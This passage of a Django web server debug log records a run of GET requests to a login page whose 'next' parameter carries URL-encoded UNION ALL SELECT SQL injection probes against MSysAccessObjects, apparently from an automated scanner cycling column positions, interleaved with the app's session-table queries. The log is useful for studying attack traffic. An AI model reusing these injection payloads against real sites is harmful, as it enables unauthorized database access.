/login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27mVimoEshoAfdbfqqsUhgQeBjUljrludIpkjhtBJO%27%7C%7C%27qppzq%27%20FROM%20MSysAccessObjects--%20frCY HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:32,846 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'owr0a2gm1tctggsyzbjym2i08bpt8pkf' LIMIT 1; args=('owr0a2gm1tctggsyzbjym2i08bpt8pkf',) DEBUG 2020-01-01 15:25:32,848 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('owr0a2gm1tctggsyzbjym2i08bpt8pkf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:32.846612+00:00'::timestamptz); args=('owr0a2gm1tctggsyzbjym2i08bpt8pkf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 32, 846612, tzinfo=)) [01/Jan/2020 15:25:32] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27NOjSyctgnXyUTOsFPaXhIkyJeuFRKUrewxLIpelV%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20TfSv HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:33,008 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '97mec3uwmdvzjqapr4c1lehyc8451s74' LIMIT 1; args=('97mec3uwmdvzjqapr4c1lehyc8451s74',) DEBUG 2020-01-01 15:25:33,010 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('97mec3uwmdvzjqapr4c1lehyc8451s74', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:33.008614+00:00'::timestamptz); args=('97mec3uwmdvzjqapr4c1lehyc8451s74', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 33, 8614, tzinfo=)) [01/Jan/2020 15:25:33] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27xlOQsDQynWtdhrfJeqVDTwJNVhOhufVFVHXXkEBK%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20gipR HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:33,179 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6qfkk9r5ycwpyhjieujsd9ndwtrihoyh' LIMIT 1; args=('6qfkk9r5ycwpyhjieujsd9ndwtrihoyh',) DEBUG 2020-01-01 15:25:33,181 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6qfkk9r5ycwpyhjieujsd9ndwtrihoyh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:33.179745+00:00'::timestamptz); args=('6qfkk9r5ycwpyhjieujsd9ndwtrihoyh', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 33, 179745, tzinfo=)) [01/Jan/2020 15:25:33] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27WnKymYxOAAOczUfMdnrtPNpumfVgdFFsSwWXWMtw%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20XpPR HTTP/1.0" 200 2246 DEBUG 2020-01-01 15:25:33,397 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '53vt4tsnl4hw6dhx9ogfqueyus4x6kl7' LIMIT 1; args=('53vt4tsnl4hw6dhx9ogfqueyus4x6kl7',) DEBUG 2020-01-01 15:25:33,400 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('53vt4tsnl4hw6dhx9ogfqueyus4x6kl7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:33.397889+00:00'::timestamptz); args=('53vt4tsnl4hw6dhx9ogfqueyus4x6kl7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 33, 397889, tzinfo=)) [01/Jan/2020 15:25:33] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27xPyOghOZvY%27%7C%7C%27qppzq%27%2C62%2C62%20FROM%20MSysAccessObjects--%20FiTF HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:33,595 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 't5ev9lbdaj4q3k5sq7k0c4cm0im5q0n0' LIMIT 1; args=('t5ev9lbdaj4q3k5sq7k0c4cm0im5q0n0',) DEBUG 2020-01-01 15:25:33,597 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('t5ev9lbdaj4q3k5sq7k0c4cm0im5q0n0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:33.595569+00:00'::timestamptz); args=('t5ev9lbdaj4q3k5sq7k0c4cm0im5q0n0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 33, 595569, tzinfo=)) [01/Jan/2020 15:25:33] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27JtIkVejprQ%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20MAgX HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:33,835 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'uplt3909t6qy60somn2zzg1jtlhn6i73' LIMIT 1; args=('uplt3909t6qy60somn2zzg1jtlhn6i73',) DEBUG 2020-01-01 15:25:33,838 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('uplt3909t6qy60somn2zzg1jtlhn6i73', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:33.836133+00:00'::timestamptz); args=('uplt3909t6qy60somn2zzg1jtlhn6i73', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 33, 836133, tzinfo=)) [01/Jan/2020 15:25:33] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C%27qxvkq%27%7C%7C%27stCTbqOEsJ%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20zfSC HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:33,997 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '62hmjnkun9mp9vb6j5yozixrju9d7ybs' LIMIT 1; args=('62hmjnkun9mp9vb6j5yozixrju9d7ybs',) DEBUG 2020-01-01 15:25:34,000 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('62hmjnkun9mp9vb6j5yozixrju9d7ybs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:33.998558+00:00'::timestamptz); args=('62hmjnkun9mp9vb6j5yozixrju9d7ybs', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 33, 998558, tzinfo=)) [01/Jan/2020 15:25:34] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%20%27qxvkq%27%7C%7C%27bMzmTjENmt%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20WQCb HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:34,181 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '2532agkm0rnp9enjxmjvs55aqlkmwxk2' LIMIT 1; args=('2532agkm0rnp9enjxmjvs55aqlkmwxk2',) DEBUG 2020-01-01 15:25:34,184 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('2532agkm0rnp9enjxmjvs55aqlkmwxk2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:34.182085+00:00'::timestamptz); args=('2532agkm0rnp9enjxmjvs55aqlkmwxk2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 34, 182085, tzinfo=)) [01/Jan/2020 15:25:34] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27NxIUWPRnWA%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20hAaZ HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:34,329 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lxdmraviedq0meac0rnu8zlkhx9ltsim' LIMIT 1; args=('lxdmraviedq0meac0rnu8zlkhx9ltsim',) DEBUG 2020-01-01 15:25:34,332 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lxdmraviedq0meac0rnu8zlkhx9ltsim', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:34.330508+00:00'::timestamptz); args=('lxdmraviedq0meac0rnu8zlkhx9ltsim', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 34, 330508, tzinfo=)) [01/Jan/2020 15:25:34] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27nZykQtDBGA%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20RNGA HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:34,506 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zeoa5e03ttksqbcn1b4sjc8ae53s87ud' LIMIT 1; args=('zeoa5e03ttksqbcn1b4sjc8ae53s87ud',) DEBUG 2020-01-01 15:25:34,509 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zeoa5e03ttksqbcn1b4sjc8ae53s87ud', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:34.507535+00:00'::timestamptz); args=('zeoa5e03ttksqbcn1b4sjc8ae53s87ud', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 34, 507535, tzinfo=)) [01/Jan/2020 15:25:34] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27XqhsJDzXVE%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20czLo HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:34,695 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ywu9d78nql8677raka80v4ugdtfbqdyq' LIMIT 1; args=('ywu9d78nql8677raka80v4ugdtfbqdyq',) DEBUG 2020-01-01 15:25:34,698 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ywu9d78nql8677raka80v4ugdtfbqdyq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:34.696288+00:00'::timestamptz); args=('ywu9d78nql8677raka80v4ugdtfbqdyq', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 34, 696288, tzinfo=)) [01/Jan/2020 15:25:34] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27FpgzoJvLKY%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20eKLD HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:34,861 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'md2xaok5whdm1skgmjy9gjyrn7ynd2f4' LIMIT 1; args=('md2xaok5whdm1skgmjy9gjyrn7ynd2f4',) DEBUG 2020-01-01 15:25:34,864 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('md2xaok5whdm1skgmjy9gjyrn7ynd2f4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:34.862138+00:00'::timestamptz); args=('md2xaok5whdm1skgmjy9gjyrn7ynd2f4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 34, 862138, tzinfo=)) [01/Jan/2020 15:25:34] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27xYUklEEpwl%27%7C%7C%27qppzq%27%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20iPri HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:35,027 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'wlemmshpsvyfer2ylbd9r9vqegf1k546' LIMIT 1; args=('wlemmshpsvyfer2ylbd9r9vqegf1k546',) DEBUG 2020-01-01 15:25:35,029 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('wlemmshpsvyfer2ylbd9r9vqegf1k546', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:35.028057+00:00'::timestamptz); args=('wlemmshpsvyfer2ylbd9r9vqegf1k546', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 35, 28057, tzinfo=)) [01/Jan/2020 15:25:35] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27JnPpHswrRz%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20SFVQ HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:35,193 utils 2749 140297233225472 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '739kjoiq1rndtk171gcxlxfc7rjr2w2k' LIMIT 1; args=('739kjoiq1rndtk171gcxlxfc7rjr2w2k',) DEBUG 2020-01-01 15:25:35,196 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('739kjoiq1rndtk171gcxlxfc7rjr2w2k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:35.194367+00:00'::timestamptz); args=('739kjoiq1rndtk171gcxlxfc7rjr2w2k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 35, 194367, tzinfo=)) [01/Jan/2020 15:25:35] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27tsiKhvOzmK%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20bFLA HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:35,344 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lhpyom80f7d4a682r2go5bt2vza7g9oj' LIMIT 1; args=('lhpyom80f7d4a682r2go5bt2vza7g9oj',) DEBUG 2020-01-01 15:25:35,346 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lhpyom80f7d4a682r2go5bt2vza7g9oj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:35.344618+00:00'::timestamptz); args=('lhpyom80f7d4a682r2go5bt2vza7g9oj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 35, 344618, tzinfo=)) [01/Jan/2020 15:25:35] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27gZigtIphVx%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20ptqk HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:35,519 utils 2749 140297233225472 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v75vyuwkph76xmcwly030s053g5on07s' LIMIT 1; args=('v75vyuwkph76xmcwly030s053g5on07s',) DEBUG 2020-01-01 15:25:35,521 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v75vyuwkph76xmcwly030s053g5on07s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:35.520291+00:00'::timestamptz); args=('v75vyuwkph76xmcwly030s053g5on07s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 35, 520291, tzinfo=)) [01/Jan/2020 15:25:35] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27oVGQhFTszE%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20TtTB HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:35,658 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ldvlmzvo94dqjxatg4kgzifd50em33bo' LIMIT 1; args=('ldvlmzvo94dqjxatg4kgzifd50em33bo',) DEBUG 2020-01-01 15:25:35,660 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ldvlmzvo94dqjxatg4kgzifd50em33bo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:35.658904+00:00'::timestamptz); args=('ldvlmzvo94dqjxatg4kgzifd50em33bo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 35, 658904, tzinfo=)) [01/Jan/2020 15:25:35] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27JDUlAiyzpu%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20GMaI HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:35,822 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '70isbl9z6itlmbhw7dh49holobr42jr7' LIMIT 1; args=('70isbl9z6itlmbhw7dh49holobr42jr7',) DEBUG 2020-01-01 15:25:35,824 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('70isbl9z6itlmbhw7dh49holobr42jr7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:35.823005+00:00'::timestamptz); args=('70isbl9z6itlmbhw7dh49holobr42jr7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 35, 823005, tzinfo=)) [01/Jan/2020 15:25:35] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C%27qxvkq%27%7C%7C%27VPOjdBrZXL%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20qcTa HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:36,014 utils 2749 140297233225472 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'zstsle7ylou1ob578yne2gc92khaaj3h' LIMIT 1; args=('zstsle7ylou1ob578yne2gc92khaaj3h',) DEBUG 2020-01-01 15:25:36,017 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('zstsle7ylou1ob578yne2gc92khaaj3h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:36.015491+00:00'::timestamptz); args=('zstsle7ylou1ob578yne2gc92khaaj3h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 36, 15491, tzinfo=)) [01/Jan/2020 15:25:36] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27LogBPIUGOR%27%7C%7C%27qppzq%27%2C62%20FROM%20MSysAccessObjects--%20zUbL HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:36,157 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v21vtqbsg9d2fzc8irw4il92y6wo885w' LIMIT 1; args=('v21vtqbsg9d2fzc8irw4il92y6wo885w',) DEBUG 2020-01-01 15:25:36,158 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v21vtqbsg9d2fzc8irw4il92y6wo885w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:36.157678+00:00'::timestamptz); args=('v21vtqbsg9d2fzc8irw4il92y6wo885w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 36, 157678, tzinfo=)) [01/Jan/2020 15:25:36] "GET /login/?next=%2F%20UNION%20ALL%20SELECT%2062%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C%27qxvkq%27%7C%7C%27NaBhvwcxCU%27%7C%7C%27qppzq%27%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%2C62%20FROM%20MSysAccessObjects--%20tzyk HTTP/1.0" 200 2186 DEBUG 2020-01-01 15:25:36,293 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'coeb54zwpdt7t6qclde95p6szzq8vlyw' LIMIT 1; args=('coeb54zwpdt7t6qclde95p6szzq8vlyw',) DEBUG 2020-01-01 15:25:36,295 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('coeb54zwpdt7t6qclde95p6szzq8vlyw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T15:25:36.294326+00:00'::timestamptz); args=('coeb54zwpdt7t6qclde95p6szzq8vlyw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 15, 25, 36, 294326, tzinfo=)) [01/Jan/2020 15:25:36] "GET 